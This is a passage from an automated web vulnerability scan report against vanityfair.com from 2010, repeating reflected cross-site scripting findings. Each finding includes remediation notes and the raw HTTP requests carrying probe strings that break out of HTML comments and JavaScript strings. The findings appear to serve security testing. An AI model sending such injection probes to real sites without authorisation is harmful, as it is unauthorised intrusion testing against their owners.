The value of REST URL parameter 4 is copied into an HTML comment. The payload b5a5f-->defc695a165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11b5a5f-->defc695a165/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:18 GMT
Date: Mon, 29 Nov 2010 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1683743881]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11b5a5f-->defc695a165/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html?proxyuri=online%2Fdaily%2F2010%2F11b5a5f--%3Edefc695a165%2Fwhy-sarah-palins-alaska-lost-nearly-half-its-viewers.html':
escaped absolute path n
...[SNIP]...

1.199. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f62'%3b4a38c756d74 was submitted in the REST URL parameter 4. This input was echoed as 74f62';4a38c756d74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/1174f62'%3b4a38c756d74/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:17 GMT
Date: Mon, 29 Nov 2010 16:49:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/1174f62';4a38c756d74/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives
...[SNIP]...

1.200. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload fce87-->b1703c27c79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.htmlfce87-->b1703c27c79 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:34 GMT
Date: Mon, 29 Nov 2010 16:49:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
g:
-:[1409036737]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.htmlfce87-->b1703c27c79?proxyuri=online%2Fdaily%2F2010%2F11%2Fwhy-sarah-palins-alaska-lost-nearly-half-its-viewers.htmlfce87--%3Eb1703c27c79':
escaped absolute path not valid.
->
...[SNIP]...

1.201. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58adb'%3b8d36709a3 was submitted in the REST URL parameter 5. This input was echoed as 58adb';8d36709a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html58adb'%3b8d36709a3 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:32 GMT
Date: Mon, 29 Nov 2010 16:49:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
cript type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html58adb';8d36709a3',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.202. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b21aa-->5881383178f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010b21aa-->5881383178f/11/wikileaks-blind-items.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:39 GMT
Date: Mon, 29 Nov 2010 16:48:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[665057009]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010b21aa-->5881383178f/11/wikileaks-blind-items.html?proxyuri=online%2Fdaily%2F2010b21aa--%3E5881383178f%2F11%2Fwikileaks-blind-items.html':
escaped absolute path not valid.
->
...[SNIP]...

1.203. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fe2b'%3b218b5adc48e was submitted in the REST URL parameter 3. This input was echoed as 1fe2b';218b5adc48e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/20101fe2b'%3b218b5adc48e/11/wikileaks-blind-items.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:37 GMT
Date: Mon, 29 Nov 2010 16:48:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/20101fe2b';218b5adc48e/11/wikileaks-blind-items.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue global
...[SNIP]...

1.204. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b0bc'%3b6244b1b49b9 was submitted in the REST URL parameter 4. This input was echoed as 3b0bc';6244b1b49b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/113b0bc'%3b6244b1b49b9/wikileaks-blind-items.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:57 GMT
Date: Mon, 29 Nov 2010 16:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/113b0bc';6244b1b49b9/wikileaks-blind-items.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.
...[SNIP]...

1.205. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload bed10-->dd76bfd9213 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11bed10-->dd76bfd9213/wikileaks-blind-items.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:58 GMT
Date: Mon, 29 Nov 2010 16:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[2122140165]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11bed10-->dd76bfd9213/wikileaks-blind-items.html?proxyuri=online%2Fdaily%2F2010%2F11bed10--%3Edd76bfd9213%2Fwikileaks-blind-items.html':
escaped absolute path not valid.
->
...[SNIP]...

1.206. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f03e7'%3b41c73998712 was submitted in the REST URL parameter 5. This input was echoed as f03e7';41c73998712 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/wikileaks-blind-items.htmlf03e7'%3b41c73998712 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:09 GMT
Date: Mon, 29 Nov 2010 16:49:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.htmlf03e7';41c73998712',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.207. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/wikileaks-blind-items.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 79a4d-->1922f4d4f3a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/wikileaks-blind-items.html79a4d-->1922f4d4f3a HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:11 GMT
Date: Mon, 29 Nov 2010 16:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ommons.exceptions.ApplicationBug:
-:[1608989912]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html79a4d-->1922f4d4f3a?proxyuri=online%2Fdaily%2F2010%2F11%2Fwikileaks-blind-items.html79a4d--%3E1922f4d4f3a':
escaped absolute path not valid.
->
...[SNIP]...

1.208. http://www.vanityfair.com/online/daily/art [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/art

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a562a'%3b4d70b756bee was submitted in the REST URL parameter 3. This input was echoed as a562a';4d70b756bee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/arta562a'%3b4d70b756bee HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
